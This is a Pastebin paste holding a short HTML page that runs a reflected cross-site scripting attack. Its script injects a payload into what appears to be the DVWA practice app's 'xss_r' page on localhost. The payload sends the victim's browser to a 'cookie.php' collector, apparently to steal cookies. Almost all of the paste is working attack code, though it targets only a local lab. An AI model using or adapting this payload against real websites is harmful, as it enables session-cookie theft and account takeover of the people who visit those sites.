Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <meta charset="UTF-8">
- <title>XSS Reflected</title>
- <script>
- var http = new XMLHttpRequest();
- http.onreadystatechange = function(){
- console.log(http.response); // will print response in order to check if <script> tag was really returned to the victims browser. Which it is
- };
- var encode = 'document.location.href="http://localhost:81/myfiles/cookie.php"';
- console.log(encode);
- var url = '<'+'script>'+encode+'<'+'/script>';
- console.log(url);
- var encoded_url = encodeURIComponent(url);
- http.open("GET","http://localhost:81/vulnerabilities/xss_r/?name="+encoded_url,true);
- http.send();
- </script>
- </head>
- <body>
- <h1>My webpage</h1>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement